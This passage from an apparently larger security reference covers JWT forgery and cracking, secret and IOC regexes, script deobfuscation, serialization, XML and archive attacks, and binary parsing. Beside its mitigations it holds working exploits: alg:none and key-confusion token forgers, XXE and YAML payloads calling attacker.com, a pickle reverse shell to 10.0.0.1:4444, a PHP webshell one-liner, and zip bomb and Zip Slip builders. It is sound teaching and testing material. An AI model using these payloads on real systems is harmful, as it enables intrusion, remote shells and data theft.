        decoded = base64.urlsafe_b64decode(padded)
        return json.loads(decoded)

    header = decode_part(parts[0])
    payload = decode_part(parts[1])
    signature = parts[2]

    return {
        'header': header,
        'payload': payload,
        'signature': signature,
        'raw_parts': parts
    }

# Example
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
result = jwt_decode(token)
print(json.dumps(result['header'], indent=2))
# {"alg": "HS256", "typ": "JWT"}
print(json.dumps(result['payload'], indent=2))
# {"sub": "1234567890", "name": "John Doe", "iat": 1516239022}
# Bash — decode JWT
echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d 2>/dev/null
# {"alg":"HS256"}

# Full decode
TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.dozjgNryP4J3jVmNHl0w5N_XgL0n3I9PlFUP0THsR8U"
echo "$TOKEN" | cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool

Forge JWT with alg:none attack (CVE-2015-9235)

import base64
import json

def jwt_forge_none(payload: dict) -> str:
    """Forge JWT with alg:none — exploits servers that don't verify algorithm."""
    header = {"alg": "none", "typ": "JWT"}

    def encode_part(data: dict) -> str:
        return base64.urlsafe_b64encode(
            json.dumps(data, separators=(',', ':')).encode()
        ).rstrip(b'=').decode()

    return f"{encode_part(header)}.{encode_part(payload)}."

# Forge admin token
forged = jwt_forge_none({
    "sub": "1",
    "name": "admin",
    "role": "admin",
    "iat": 1516239022
})
print(forged)
# eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.

# Variations that bypass filters:
# "alg": "None"
# "alg": "NONE"
# "alg": "nOnE"

Forge JWT with HMAC/RSA confusion (CVE-2016-10555)

import hmac
import hashlib
import base64
import json

def jwt_forge_hmac_rsa_confusion(payload: dict, public_key: bytes) -> str:
    """
    If server uses RS256 but accepts HS256, sign with the PUBLIC key as HMAC secret.
    The server will verify using the public key as HMAC key — signature matches.
    """
    header = {"alg": "HS256", "typ": "JWT"}

    def encode_part(data: dict) -> str:
        return base64.urlsafe_b64encode(
            json.dumps(data, separators=(',', ':')).encode()
        ).rstrip(b'=').decode()

    header_b64 = encode_part(header)
    payload_b64 = encode_part(payload)
    signing_input = f"{header_b64}.{payload_b64}".encode()

    signature = hmac.new(public_key, signing_input, hashlib.sha256).digest()
    sig_b64 = base64.urlsafe_b64encode(signature).rstrip(b'=').decode()

    return f"{header_b64}.{payload_b64}.{sig_b64}"

# Usage: obtain server's public key (often in /.well-known/jwks.json or /api/public-key)
# with open("public.pem", "rb") as f:
#     forged = jwt_forge_hmac_rsa_confusion({"sub": "admin"}, f.read())

Crack JWT secret (HS256)

# Using hashcat
hashcat -m 16500 jwt.txt wordlist.txt

# Using john the ripper
john jwt.txt --wordlist=wordlist.txt --format=HMAC-SHA256

# Using jwt_tool (pip install jwt_tool)
python3 jwt_tool.py <token> -C -d wordlist.txt
import hmac
import hashlib
import base64

def jwt_crack(token: str, wordlist_path: str) -> str | None:
    """Brute-force HS256 JWT secret from a wordlist."""
    parts = token.split('.')
    signing_input = f"{parts[0]}.{parts[1]}".encode()
    target_sig = base64.urlsafe_b64decode(parts[2] + '==')

    with open(wordlist_path, 'r', errors='ignore') as f:
        for line in f:
            secret = line.strip()
            computed = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
            if hmac.compare_digest(computed, target_sig):
                return secret
    return None

JWT security checklist

Attack Condition Mitigation
alg:none Server accepts unsigned tokens Reject none algorithm; whitelist allowed algorithms
HMAC/RSA confusion Server accepts HS256 when configured for RS256 Enforce algorithm in server config, not from token header
Weak secret Short/guessable HMAC key Use 256+ bit random secret
No expiry Missing exp claim Always set and validate exp
kid injection kid header used in SQL/file lookup Sanitize kid, use allowlist
jwk/jku injection Server fetches attacker-controlled key Whitelist key sources
Claim tampering Only signature checked, not claims Validate all security-relevant claims server-side

10. Regular Expressions for Security

IPv4 / IPv6

import re

# IPv4 — strict
IPV4 = re.compile(
    r'\b(?:(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}'
    r'(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\b'
)

# IPv4 with CIDR
IPV4_CIDR = re.compile(
    r'\b(?:(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}'
    r'(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)(?:/\d{1,2})?\b'
)

# IPv6 — simplified (matches most common forms)
IPV6 = re.compile(r'\b(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}\b'
                   r'|(?:[0-9a-fA-F]{1,4}:)*:(?::[0-9a-fA-F]{1,4})*')

# Private/RFC1918 ranges
PRIVATE_IPV4 = re.compile(
    r'\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|'
    r'172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}|'
    r'192\.168\.\d{1,3}\.\d{1,3})\b'
)

URLs

URL = re.compile(
    r'https?://(?:[\w-]+\.)+[\w]{2,}'      # scheme + domain
    r'(?::\d{1,5})?'                         # optional port
    r'(?:/[^\s\'"<>]*)?'                     # optional path
)

# Extract domain from URL
DOMAIN = re.compile(r'https?://([^/:]+)')

Email

EMAIL = re.compile(
    r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
)

Hashes (for IOC extraction)

MD5_RE    = re.compile(r'\b[0-9a-fA-F]{32}\b')
SHA1_RE   = re.compile(r'\b[0-9a-fA-F]{40}\b')
SHA256_RE = re.compile(r'\b[0-9a-fA-F]{64}\b')
SHA512_RE = re.compile(r'\b[0-9a-fA-F]{128}\b')

CVE IDs

CVE = re.compile(r'CVE-\d{4}-\d{4,}')

Credit card numbers (PCI DSS scanning)

# Visa
VISA = re.compile(r'\b4\d{3}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b')

# Mastercard
MC = re.compile(r'\b5[1-5]\d{2}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b')

# AMEX
AMEX = re.compile(r'\b3[47]\d{2}[\s-]?\d{6}[\s-]?\d{5}\b')

# Generic (13-19 digits, optionally separated)
CC_GENERIC = re.compile(r'\b(?:\d[\s-]?){13,19}\b')

def luhn_check(number: str) -> bool:
    """Validate credit card number with Luhn algorithm."""
    digits = [int(d) for d in number if d.isdigit()]
    digits.reverse()
    total = 0
    for i, d in enumerate(digits):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

SSN (US Social Security Number)

SSN = re.compile(r'\b\d{3}-\d{2}-\d{4}\b')
# Stricter (excludes known invalid ranges)
SSN_STRICT = re.compile(
    r'\b(?!000|666|9\d{2})\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b'
)

API keys and secrets

# AWS Access Key ID
AWS_KEY = re.compile(r'\b(?:AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}\b')

# AWS Secret Access Key
AWS_SECRET = re.compile(r'(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])')

# GitHub Personal Access Token
GITHUB_PAT = re.compile(r'\bghp_[A-Za-z0-9]{36}\b')
GITHUB_PAT_FINE = re.compile(r'\bgithub_pat_[A-Za-z0-9_]{82}\b')

# Slack Bot Token
SLACK_BOT = re.compile(r'\bxoxb-\d{10,13}-\d{10,13}-[a-zA-Z0-9]{24}\b')

# Slack Webhook
SLACK_WEBHOOK = re.compile(r'https://hooks\.slack\.com/services/T[A-Z0-9]{8}/B[A-Z0-9]{8}/[a-zA-Z0-9]{24}')

# Google API Key
GOOGLE_API = re.compile(r'\bAIza[0-9A-Za-z_-]{35}\b')

# Generic high-entropy string (potential secret)
import math
def entropy(s: str) -> float:
    freq = {}
    for c in s:
        freq[c] = freq.get(c, 0) + 1
    return -sum((f/len(s)) * math.log2(f/len(s)) for f in freq.values())

# Strings > 20 chars with entropy > 4.5 are suspicious
GENERIC_SECRET = re.compile(r'(?:key|token|secret|password|api_key|apikey|access_key)\s*[=:]\s*["\']?([A-Za-z0-9+/=_-]{20,})["\']?', re.IGNORECASE)

# Private key markers
PRIVATE_KEY = re.compile(r'-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----')

# JWT pattern
JWT_RE = re.compile(r'\beyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*\b')

Combined IOC extractor

def extract_iocs(text: str) -> dict[str, list[str]]:
    """Extract all security-relevant indicators from text."""
    return {
        'ipv4': list(set(IPV4.findall(text))),
        'email': list(set(EMAIL.findall(text))),
        'url': list(set(URL.findall(text))),
        'md5': list(set(MD5_RE.findall(text))),
        'sha1': list(set(SHA1_RE.findall(text))),
        'sha256': list(set(SHA256_RE.findall(text))),
        'cve': list(set(CVE.findall(text))),
        'aws_key': list(set(AWS_KEY.findall(text))),
        'github_pat': list(set(GITHUB_PAT.findall(text))),
        'jwt': list(set(JWT_RE.findall(text))),
        'private_key': list(set(PRIVATE_KEY.findall(text))),
    }

11. Obfuscation & Deobfuscation

JavaScript obfuscation patterns

# --- JSFuck (encode JS using only []()!+ ) ---
# '(' becomes: (![]+[])[+!+[]+!+[]+!+[]]
# Full charset available from 6 characters

# --- Hex escape obfuscation ---
# eval("\x61\x6c\x65\x72\x74\x28\x31\x29")  ->  eval("alert(1)")

# --- Unicode escape ---
# \u0061\u006c\u0065\u0072\u0074(1)  ->  alert(1)

# --- String.fromCharCode ---
# eval(String.fromCharCode(97,108,101,114,116,40,49,41))  ->  eval("alert(1)")

# --- Deobfuscate String.fromCharCode ---
def deobfuscate_charcode(js: str) -> str:
    """Deobfuscate String.fromCharCode() calls."""
    import re
    pattern = r'String\.fromCharCode\(([\d,\s]+)\)'
    def replace(m):
        chars = [int(c.strip()) for c in m.group(1).split(',')]
        return repr(''.join(chr(c) for c in chars))
    return re.sub(pattern, replace, js)

# --- Deobfuscate hex/unicode escapes ---
def deobfuscate_js_escapes(js: str) -> str:
    """Resolve \\xNN and \\uNNNN escapes in JavaScript strings."""
    import re
    # \xNN
    result = re.sub(r'\\x([0-9a-fA-F]{2})',
                    lambda m: chr(int(m.group(1), 16)), js)
    # \uNNNN
    result = re.sub(r'\\u([0-9a-fA-F]{4})',
                    lambda m: chr(int(m.group(1), 16)), result)
    return result

# --- Deobfuscate atob() (base64 in JS) ---
# atob("YWxlcnQoMSk=") -> "alert(1)"
def deobfuscate_atob(js: str) -> str:
    import re, base64
    pattern = r'atob\(["\']([A-Za-z0-9+/=]+)["\']\)'
    def replace(m):
        return repr(base64.b64decode(m.group(1)).decode())
    return re.sub(pattern, replace, js)

PowerShell obfuscation patterns

# --- Encoded command ---
# powershell -enc <base64 of UTF-16LE>
import base64
def decode_ps_encoded_command(encoded: str) -> str:
    return base64.b64decode(encoded).decode('utf-16-le')

# --- String concatenation ---
# 'Inv'+'oke'+'-Exp'+'ression' -> 'Invoke-Expression'

# --- Backtick escaping ---
# I`nv`oke-`Exp`ression -> Invoke-Expression
def deobfuscate_backticks(ps: str) -> str:
    import re
    # Remove backticks that escape normal characters (not special ones)
    return re.sub(r'`([^0abfnrtv])', r'\1', ps)

# --- -replace with char codes ---
# [char]73 + [char]69 + [char]88 -> 'IEX'
def deobfuscate_char_cast(ps: str) -> str:
    import re
    def replace(m):
        return chr(int(m.group(1)))
    return re.sub(r'\[char\]\s*(\d+)', replace, ps, flags=re.IGNORECASE)

# --- Environment variable concatenation ---
# $env:comspec[4,15,25]-join'' -> 'IEX'  (extracting chars from 'C:\WINDOWS\system32\cmd.exe')

# --- Compressed / deflate streams ---
# IEX(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream(
#   [IO.MemoryStream][Convert]::FromBase64String('...'),
#   [IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()

def decode_ps_deflate(b64_data: str) -> str:
    import base64, zlib
    compressed = base64.b64decode(b64_data)
    # PowerShell uses raw deflate (no zlib header), wbits=-15
    return zlib.decompress(compressed, -15).decode('utf-8', errors='replace')

# --- Combined deobfuscation pipeline ---
def deobfuscate_powershell(script: str) -> str:
    script = deobfuscate_backticks(script)
    script = deobfuscate_char_cast(script)
    # Remove common no-op patterns
    script = script.replace("( ", "(").replace(" )", ")")
    return script

Python obfuscation patterns

# --- exec(compile()) ---
# exec(compile(base64.b64decode(b'cHJpbnQoImhlbGxvIik='),'<string>','exec'))

# --- Lambda chains ---
# (lambda: (lambda f: f(f))(lambda f: print("hello")))()

# --- Marshal/bytecode ---
import marshal, types
code = compile("print('hello')", "<string>", "exec")
serialized = marshal.dumps(code)
# Reconstruct: exec(marshal.loads(serialized))

# --- Deobfuscation: extract strings from exec/eval ---
def safe_deobfuscate_exec(code: str) -> str:
    """Replace exec/eval with print to see what would execute."""
    import re
    code = re.sub(r'\bexec\s*\(', 'print(', code)
    code = re.sub(r'\beval\s*\(', 'print(', code)
    return code
# WARNING: Only run deobfuscated code in a sandbox/VM

PHP obfuscation patterns

// Common patterns in webshells:

// eval(base64_decode('...'))
// eval(gzinflate(base64_decode('...')))
// eval(str_rot13('...'))
// preg_replace('/.*/e', base64_decode('...'), '')   // /e modifier = eval (PHP < 7)
// assert(base64_decode('...'))                       // acts like eval
// create_function('', base64_decode('...'))          // anonymous eval

// Variable function calls (hiding function names):
// $f = 'sys'.'tem'; $f('whoami');
// $_GET['cmd']($_GET['arg']);                         // webshell one-liner

// chr() obfuscation:
// $f = chr(115).chr(121).chr(115).chr(116).chr(101).chr(109); $f('id');
# Deobfuscate PHP eval(base64_decode(...))
import re
import base64

def deobfuscate_php_b64(php_code: str) -> str:
    pattern = r'(?:eval|assert)\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=]+)[\'"]\s*\)\s*\)'
    def replace(m):
        decoded = base64.b64decode(m.group(1)).decode('utf-8', errors='replace')
        return f'/* DECODED: */ {decoded}'
    return re.sub(pattern, replace, php_code)

# Deobfuscate PHP chr() chains
def deobfuscate_php_chr(php_code: str) -> str:
    pattern = r'chr\((\d+)\)'
    parts = re.split(r'(chr\(\d+\))', php_code)
    result = []
    for part in parts:
        m = re.match(r'chr\((\d+)\)', part)
        if m:
            result.append(chr(int(m.group(1))))
        else:
            result.append(part.replace('.', ''))
    return ''.join(result)

12. Serialization Security

JSON

import json

# Standard encode/decode
data = {"user": "admin", "role": "user"}
encoded = json.dumps(data)
decoded = json.loads(encoded)

# Security: JSON injection via key/value manipulation
# If user controls a JSON key or value without escaping:
# {"user": "admin", "role": "user"} could become
# {"user": "admin", "role": "admin"} via parameter pollution

# JSON comment stripping (some parsers accept comments)
# {"key": "value" /* comment */}  -> invalid JSON but some libs accept it

# Large number handling (precision loss)
# JavaScript: JSON.parse('{"id": 9999999999999999}') -> 10000000000000000
# Python handles arbitrary precision; JS does not

# Duplicate key behavior (parser-dependent)
json.loads('{"a": 1, "a": 2}')  # Python: {'a': 2} (last wins)
# Other parsers may take first, error, or behave inconsistently
# Exploitation: WAF parses first key, backend parses last key

XML (XXE, XSS, billion laughs)

# --- DANGEROUS: Default XML parsing allows XXE ---
# NEVER use xml.etree.ElementTree with untrusted input without disabling entities

# XXE payload examples:
xxe_file_read = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>"""

xxe_ssrf = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>"""

xxe_oob = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<root>&send;</root>"""

# Billion Laughs (XML bomb) — exponential entity expansion
xml_bomb = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<root>&lol9;</root>"""
# 3 bytes "lol" expands to ~3 GB

# SAFE XML parsing in Python
import defusedxml.ElementTree as ET  # pip install defusedxml
# or with stdlib:
from xml.etree.ElementTree import XMLParser
# Disable entities manually — defusedxml is strongly preferred

YAML (arbitrary code execution)

import yaml

# DANGEROUS: yaml.load() with default Loader executes arbitrary Python
dangerous_yaml = """
!!python/object/apply:os.system
args: ['id']
"""
# yaml.load(dangerous_yaml, Loader=yaml.UnsafeLoader)  # EXECUTES 'id'

# SAFE: Always use SafeLoader
safe = yaml.safe_load("key: value")

# Exploit payloads:
yaml_rce_payloads = [
    "!!python/object/apply:os.system ['whoami']",
    "!!python/object/apply:subprocess.check_output [['id']]",
    "!!python/object/new:os.system ['curl http://attacker.com']",
    "!!python/object/apply:builtins.eval ['__import__(\"os\").system(\"id\")']",
]

# Ruby YAML (Psych) RCE:
# --- !!ruby/object:Gem::Installer
# --- i: x
# --- !!ruby/object:Gem::SpecFetcher
# ---   i: y
# --- !!ruby/object:Gem::Requirement
# ---   requirements:
# ---     !!ruby/object:Gem::Package::TarReader
# ---     io: &1 !!ruby/object:Net::BufferedIO
# ---       io: &1 !!ruby/object:Gem::Package::TarReader::Entry
# ---          read: 0
# ---          header: "abc"
# ---       debug_output: &1 !!ruby/object:Net::WriteAdapter
# ---          socket: &1 !!ruby/object:Gem::RequestSet
# ---              sets: !!ruby/object:Net::WriteAdapter
# ---                  socket: !ruby/module 'Kernel'
# ---                  method_id: :system
# ---              git_set: id
# ---          method_id: :resolve

Python pickle (arbitrary code execution)

import pickle
import os

# NEVER unpickle untrusted data — equivalent to eval()

# RCE via pickle:
class Exploit:
    def __reduce__(self):
        return (os.system, ('id',))

payload = pickle.dumps(Exploit())
print(payload)
# Unpickling this runs 'id'

# More sophisticated: reverse shell via pickle
class ReverseShell:
    def __reduce__(self):
        import subprocess
        return (subprocess.Popen, (
            ['bash', '-c', 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'],
        ))

# Detection: look for these opcodes in pickle data
# \x80 = PROTO
# c = GLOBAL (c__builtin__\neval\n -> dangerous)
# R = REDUCE (calls the callable)
# ( = MARK

def is_pickle_dangerous(data: bytes) -> bool:
    """Heuristic check for dangerous pickle opcodes."""
    dangerous_modules = [b'os', b'subprocess', b'builtins', b'nt',
                         b'posix', b'commands', b'sys', b'importlib']
    for mod in dangerous_modules:
        if mod in data:
            return True
    return False

# Safe alternative: use json, msgpack, or protobuf
# If pickle is required, use hmac to sign before unpickling:
import hmac, hashlib
def safe_pickle_dump(obj, key: bytes) -> tuple[bytes, bytes]:
    data = pickle.dumps(obj)
    sig = hmac.new(key, data, hashlib.sha256).digest()
    return data, sig

def safe_pickle_load(data: bytes, sig: bytes, key: bytes):
    expected = hmac.new(key, data, hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("Pickle signature verification failed")
    return pickle.loads(data)

PHP serialize/unserialize

# PHP serialization format:
# s:5:"hello";                -> string(5) "hello"
# i:42;                       -> int 42
# b:1;                        -> bool true
# a:2:{s:1:"a";i:1;s:1:"b";i:2;}  -> array("a"=>1, "b"=>2)
# O:4:"User":1:{s:4:"name";s:5:"admin";}  -> User object

# PHP Object Injection: if unserialize() is called on user input,
# attacker can instantiate arbitrary classes and trigger __wakeup(),
# __destruct(), __toString() magic methods

# Python tool to craft PHP serialized payloads:
def php_serialize_string(s: str) -> str:
    return f's:{len(s)}:"{s}";'

def php_serialize_object(class_name: str, properties: dict) -> str:
    props = ''
    for key, value in properties.items():
        props += php_serialize_string(key)
        if isinstance(value, str):
            props += php_serialize_string(value)
        elif isinstance(value, int):
            props += f'i:{value};'
    return f'O:{len(class_name)}:"{class_name}":{len(properties)}:{{{props}}}'

# Forge admin object
payload = php_serialize_object("User", {"role": "admin", "id": 1})
# O:4:"User":2:{s:4:"role";s:5:"admin";s:2:"id";i:1;}

# Type juggling via loose comparison:
# "0e12345" == "0e99999" is TRUE in PHP (both are 0 in scientific notation)
# Exploit: find MD5 hash starting with "0e" followed by only digits
# MD5("240610708") = "0e462097431906509019562988736854" -> equals "0" in loose comparison

13. Compression Security

gzip analysis

import gzip
import struct

# Compress / decompress
data = b"A" * 10000
compressed = gzip.compress(data)
decompressed = gzip.decompress(compressed)

# Parse gzip header (RFC 1952)
def parse_gzip_header(data: bytes) -> dict:
    if data[:2] != b'\x1f\x8b':
        raise ValueError("Not a gzip file")
    method = data[2]        # 8 = deflate
    flags = data[3]
    mtime = struct.unpack('<I', data[4:8])[0]
    return {
        'magic': data[:2].hex(),
        'method': 'deflate' if method == 8 else f'unknown({method})',
        'flags': f'{flags:08b}',
        'ftext': bool(flags & 1),
        'fhcrc': bool(flags & 2),
        'fextra': bool(flags & 4),
        'fname': bool(flags & 8),
        'fcomment': bool(flags & 16),
        'mtime': mtime,
    }
# Analyze gzip file
file suspicious.gz
gzip -l suspicious.gz           # list compression ratio
gzip -d -c suspicious.gz        # decompress to stdout
zcat suspicious.gz              # same as above

# Detect gzip by magic bytes
xxd suspicious.bin | head -1    # look for 1f8b

ZIP analysis and attacks

import zipfile
import os

# List contents
with zipfile.ZipFile('archive.zip', 'r') as zf:
    for info in zf.infolist():
        print(f"{info.filename:40} {info.file_size:>10} -> {info.compress_size:>10} "
              f"{'encrypted' if info.flag_bits & 0x1 else ''}")

# --- ZIP path traversal (Zip Slip) ---
# Malicious zip contains: ../../etc/cron.d/evil
# When extracted naively, writes outside target directory

def safe_extract(zip_path: str, dest: str) -> None:
    """Extract ZIP safely, preventing path traversal."""
    dest = os.path.realpath(dest)
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for member in zf.infolist():
            member_path = os.path.realpath(os.path.join(dest, member.filename))
            if not member_path.startswith(dest + os.sep) and member_path != dest:
                raise ValueError(f"Path traversal detected: {member.filename}")
            zf.extract(member, dest)

# --- Detect path traversal in ZIP ---
def check_zip_traversal(zip_path: str) -> list[str]:
    dangerous = []
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for name in zf.namelist():
            if name.startswith('/') or '..' in name:
                dangerous.append(name)
    return dangerous

# --- Create Zip Slip payload ---
def create_zip_slip(output: str, target_path: str, content: bytes) -> None:
    """Create a ZIP with path traversal payload. Authorized testing only."""
    with zipfile.ZipFile(output, 'w') as zf:
        zf.writestr(target_path, content)

# create_zip_slip('evil.zip', '../../../../tmp/evil.sh', b'#!/bin/bash\nid > /tmp/pwned\n')

ZIP bomb (decompression bomb)

# --- Nested ZIP bomb ---
# 42.zip: 42KB compressed -> 4.5 PB decompressed (nested ZIPs)
# Single-layer bomb:

def detect_zip_bomb(zip_path: str, ratio_threshold: int = 100,
                     size_threshold: int = 1_000_000_000) -> bool:
    """Detect potential ZIP bomb by compression ratio."""
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for info in zf.infolist():
            if info.compress_size > 0:
                ratio = info.file_size / info.compress_size
                if ratio > ratio_threshold or info.file_size > size_threshold:
                    return True
            elif info.file_size > 0:
                return True  # zero compressed size but non-zero file size
    return False

# Create a simple zip bomb (for testing decompression limits)
def create_zip_bomb(output: str, uncompressed_size: int = 10_000_000) -> None:
    """Create a single-layer zip bomb. Testing only."""
    with zipfile.ZipFile(output, 'w', zipfile.ZIP_DEFLATED) as zf:
        # Highly compressible data
        zf.writestr('bomb.txt', b'\x00' * uncompressed_size)

tar analysis and attacks

# List tar contents (check for path traversal)
tar -tvf archive.tar | grep -E '^\.\./|^/'

# Safe extraction (GNU tar strips leading / by default)
tar --no-same-owner --no-same-permissions -xvf archive.tar -C /tmp/safe/

# Check for symlink attacks
tar -tvf archive.tar | grep '^l'
import tarfile

# Detect dangerous tar entries
def check_tar_safety(tar_path: str) -> list[str]:
    issues = []
    with tarfile.open(tar_path) as tf:
        for member in tf.getmembers():
            # Path traversal
            if member.name.startswith('/') or '..' in member.name:
                issues.append(f"PATH_TRAVERSAL: {member.name}")
            # Symlink outside extraction directory
            if member.issym() or member.islnk():
                issues.append(f"SYMLINK: {member.name} -> {member.linkname}")
            # Setuid/setgid bits
            if member.mode & 0o4000 or member.mode & 0o2000:
                issues.append(f"SETUID/SETGID: {member.name} mode={oct(member.mode)}")
            # Device files
            if member.isdev():
                issues.append(f"DEVICE_FILE: {member.name}")
    return issues

# Safe extraction (Python 3.12+ has filter parameter)
# tarfile.open(path).extractall(dest, filter='data')  # Python 3.12+

14. Binary & Struct Manipulation

struct packing and unpacking

import struct

# Format characters:
# < little-endian    > big-endian    ! network (big-endian)    = native
# b/B signed/unsigned byte (1)
# h/H signed/unsigned short (2)
# i/I signed/unsigned int (4)
# l/L signed/unsigned long (4)
# q/Q signed/unsigned long long (8)
# f   float (4)       d   double (8)
# s   char[] (bytes)  p   pascal string
# x   padding byte

# Pack values into binary
packed = struct.pack('<IHH', 0xdeadbeef, 0x1234, 0x5678)
print(packed.hex())   # efbeadde34127856 (little-endian)

# Unpack binary to values
values = struct.unpack('<IHH', packed)
print([hex(v) for v in values])  # ['0xdeadbeef', '0x1234', '0x5678']

# Network byte order (big-endian) for IP/TCP
import socket
ip_packed = socket.inet_aton("192.168.1.1")   # b'\xc0\xa8\x01\x01'
ip_int = struct.unpack('!I', ip_packed)[0]     # 3232235777
ip_str = socket.inet_ntoa(struct.pack('!I', ip_int))  # '192.168.1.1'

# Pack a C struct
# struct header { uint32_t magic; uint16_t version; uint16_t flags; uint32_t size; };
header = struct.pack('<IHHI', 0x7f454c46, 2, 1, 0x1000)

# Unpack with named fields (using namedtuple)
from collections import namedtuple
Header = namedtuple('Header', 'magic version flags size')
parsed = Header._make(struct.unpack('<IHHI', header))
print(f"Magic: {parsed.magic:#x}, Version: {parsed.version}")

Endianness

# Little-endian: least significant byte first (x86, ARM default)
# Big-endian: most significant byte first (network order, MIPS, SPARC)

value = 0xdeadbeef

# Manual conversion
le_bytes = value.to_bytes(4, 'little')   # b'\xef\xbe\xad\xde'
be_bytes = value.to_bytes(4, 'big')      # b'\xde\xad\xbe\xef'

# Swap endianness
def swap_endian_32(val: int) -> int:
    return struct.unpack('<I', struct.pack('>I', val))[0]

def swap_endian_16(val: int) -> int:
    return struct.unpack('<H', struct.pack('>H', val))[0]

# Detect endianness of a binary
def detect_endianness(data: bytes, offset: int, expected: int) -> str:
    """Check if value at offset matches expected in LE or BE."""
    le_val = struct.unpack_from('<I', data, offset)[0]
    be_val = struct.unpack_from('>I', data, offset)[0]
    if le_val == expected:
        return 'little-endian'
    elif be_val == expected:
        return 'big-endian'
    return 'unknown'

# Python int methods
val = int.from_bytes(b'\xef\xbe\xad\xde', 'little')   # 0xdeadbeef
val = int.from_bytes(b'\xde\xad\xbe\xef', 'big')       # 0xdeadbeef

ELF header parsing

import struct
from collections import namedtuple

def parse_elf_header(data: bytes) -> dict:
    """Parse ELF file header."""
    if data[:4] != b'\x7fELF':
        raise ValueError("Not an ELF file")

    ei_class = data[4]      # 1=32-bit, 2=64-bit
    ei_data = data[5]       # 1=LE, 2=BE
    ei_version = data[6]    # 1=current
    ei_osabi = data[7]      # 0=SYSV, 3=Linux, etc.

    endian = '<' if ei_data == 1 else '>'
    bits = 32 if ei_class == 1 else 64

    if bits == 64:
        # e_type(2) e_machine(2) e_version(4) e_entry(8) e_phoff(8) e_shoff(8)
        # e_flags(4) e_ehsize(2) e_phentsize(2) e_phnum(2) e_shentsize(2)
        # e_shnum(2) e_shstrndx(2)
        fmt = f'{endian}HHIQQQIHHHHHH'
        fields = struct.unpack_from(fmt, data, 16)
        e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \
        e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = fields
    else:
        fmt = f'{endian}HHIIIIIHHHHHH'
        fields = struct.unpack_from(fmt, data, 16)
        e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \
        e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = fields

    ELF_TYPES = {0: 'ET_NONE', 1: 'ET_REL', 2: 'ET_EXEC', 3: 'ET_DYN', 4: 'ET_CORE'}
    MACHINES = {0x3: 'x86', 0x3E: 'x86_64', 0x28: 'ARM', 0xB7: 'AArch64',
                0x08: 'MIPS', 0xF3: 'RISC-V'}

    return {
        'class': f'{bits}-bit',
        'endian': 'little' if ei_data == 1 else 'big',
        'type': ELF_TYPES.get(e_type, f'0x{e_type:x}'),
